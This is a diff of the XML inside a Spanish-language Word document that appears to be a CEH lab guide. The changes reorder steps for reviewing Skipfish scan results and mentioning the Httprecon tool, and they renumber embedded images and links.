-            <wp:extent cx="6120130" cy="2897505"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="8" name="Image7" descr=""/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="8" name="Image7" descr=""/>
+                    <pic:cNvPr id="8" name="Image6" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -2117,9 +1932,9 @@
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
         </w:rPr>
-        <w:t>3.</w:t>
-        <w:tab/>
-        <w:t>Expanda cada nodo para ver información detallada sobre el resultado.</w:t>
+        <w:t>-</w:t>
+        <w:tab/>
+        <w:t>El resultado del rastreo de Skipfish aparece en el navegador web y muestra los resúmenes de los tipos de documentos y problemas encontrados, como se muestra en la siguiente captura de pantalla:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2138,7 +1953,7 @@
           <w:bCs w:val="false"/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="9">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="8">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -2149,7 +1964,7 @@
             <wp:extent cx="6120130" cy="2897505"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="9" name="Image8" descr=""/>
+            <wp:docPr id="9" name="Image7" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2157,7 +1972,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="9" name="Image8" descr=""/>
+                    <pic:cNvPr id="9" name="Image7" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -2195,47 +2010,39 @@
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
         </w:rPr>
-        <w:t>4.</w:t>
-        <w:tab/>
-        <w:t>Analizar un problema encontrado en el servidor web. Haga clic en un nodo en la sección Descripción general del tipo de problema para expandirlo.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Analizar el problema del juego de caracteres incorrecto o faltante.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
+        <w:t>3.</w:t>
+        <w:tab/>
+        <w:t>Expanda cada nodo para ver información detallada sobre el resultado.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="10">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="9">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>-21590</wp:posOffset>
+              <wp:align>center</wp:align>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>210185</wp:posOffset>
+              <wp:posOffset>635</wp:posOffset>
             </wp:positionV>
             <wp:extent cx="6120130" cy="2897505"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="10" name="Image9" descr=""/>
+            <wp:docPr id="10" name="Image8" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2243,7 +2050,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="10" name="Image9" descr=""/>
+                    <pic:cNvPr id="10" name="Image8" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -2269,66 +2076,59 @@
           </wp:anchor>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>4.</w:t>
+        <w:tab/>
+        <w:t>Analizar un problema encontrado en el servidor web. Haga clic en un nodo en la sección Descripción general del tipo de problema para expandirlo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
         </w:rPr>
         <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Observe la URL de la página web asociada con la vulnerabilidad Haga clic en la URL.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>La página web aparece como se muestra en la siguiente captura de pantalla:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
+        <w:tab/>
+        <w:t>Analizar el problema del juego de caracteres incorrecto o faltante.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="11">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="10">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:align>center</wp:align>
+              <wp:posOffset>-21590</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>635</wp:posOffset>
+              <wp:posOffset>210185</wp:posOffset>
             </wp:positionV>
             <wp:extent cx="6120130" cy="2897505"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="11" name="Image10" descr=""/>
+            <wp:docPr id="11" name="Image9" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2336,7 +2136,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="11" name="Image10" descr=""/>
+                    <pic:cNvPr id="11" name="Image9" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -2362,21 +2162,20 @@
           </wp:anchor>
         </w:drawing>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
         </w:rPr>
         <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Aparece la página web de la versión php, que muestra los detalles relacionados con la máquina, así como los otros recursos asociados con la infraestructura del servidor web y la configuración de php.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>Observe la URL de la página web asociada con la vulnerabilidad Haga clic en la URL.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2392,23 +2191,7 @@
         </w:rPr>
         <w:t>-</w:t>
         <w:tab/>
-        <w:t>Haga clic en Mostrar seguimiento junto a la URL para examinar la vulnerabilidad en detalle.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>Aparece una ventana de rastreo HTTP en la página web, que muestra la sesión HTML completa, como se muestra en la siguiente captura de pantalla:</w:t>
+        <w:t>La página web aparece como se muestra en la siguiente captura de pantalla:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2427,7 +2210,7 @@
           <w:bCs w:val="false"/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="12">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="11">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:align>center</wp:align>
@@ -2438,7 +2221,7 @@
             <wp:extent cx="6120130" cy="2897505"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="12" name="Image11" descr=""/>
+            <wp:docPr id="12" name="Image10" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2446,7 +2229,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="12" name="Image11" descr=""/>
+                    <pic:cNvPr id="12" name="Image10" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -2484,6 +2267,116 @@
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
         </w:rPr>
+        <w:t>-</w:t>
+        <w:tab/>
+        <w:t>Aparece la página web de la versión php, que muestra los detalles relacionados con la máquina, así como los otros recursos asociados con la infraestructura del servidor web y la configuración de php.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>-</w:t>
+        <w:tab/>
+        <w:t>Haga clic en Mostrar seguimiento junto a la URL para examinar la vulnerabilidad en detalle.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>-</w:t>
+        <w:tab/>
+        <w:t>Aparece una ventana de rastreo HTTP en la página web, que muestra la sesión HTML completa, como se muestra en la siguiente captura de pantalla:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="12">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6120130" cy="2897505"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="13" name="Image11" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="13" name="Image11" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6120130" cy="2897505"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
         <w:tab/>
         <w:t>Nota: Si la ventana no aparece correctamente, mantenga presionada la tecla Ctrl y haga clic en el enlace.</w:t>
       </w:r>
@@ -2770,7 +2663,7 @@
         <w:tab/>
         <w:t xml:space="preserve">La herramienta Httprecon, disponible en D: \ CEH-Tools \ CEHv9 Module 11 Hacking WebServers \ Webserver Footprinting Tools \ Httprecon. También puede descargar la última versión de httprecon desde el enlace </w:t>
       </w:r>
-      <w:hyperlink r:id="rId14">
+      <w:hyperlink r:id="rId15">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -3035,7 +2928,7 @@
             <wp:extent cx="5248910" cy="5153660"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="13" name="Image12" descr=""/>
+            <wp:docPr id="14" name="Image12" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -3043,13 +2936,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="13" name="Image12" descr=""/>
+                    <pic:cNvPr id="14" name="Image12" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId16"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3578,7 +3471,7 @@
         <w:tab/>
         <w:t xml:space="preserve">Introduzca la URL del sitio web (aquí, </w:t>
       </w:r>
-      <w:hyperlink r:id="rId16">
+      <w:hyperlink r:id="rId17">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -3623,7 +3516,7 @@
             <wp:extent cx="5248910" cy="5191760"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="14" name="Image13" descr=""/>
+            <wp:docPr id="15" name="Image13" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -3631,13 +3524,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="14" name="Image13" descr=""/>
+                    <pic:cNvPr id="15" name="Image13" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId18"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4210,7 +4103,7 @@
             <wp:extent cx="5248910" cy="5153660"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="15" name="Image14" descr=""/>
+            <wp:docPr id="16" name="Image14" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -4218,13 +4111,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="15" name="Image14" descr=""/>
+                    <pic:cNvPr id="16" name="Image14" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId19"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4781,7 +4674,7 @@
             <wp:extent cx="5248910" cy="5172710"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="16" name="Image15" descr=""/>
+            <wp:docPr id="17" name="Image15" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -4789,594 +4682,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="16" name="Image15" descr=""/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5248910" cy="5172710"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:anchor>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
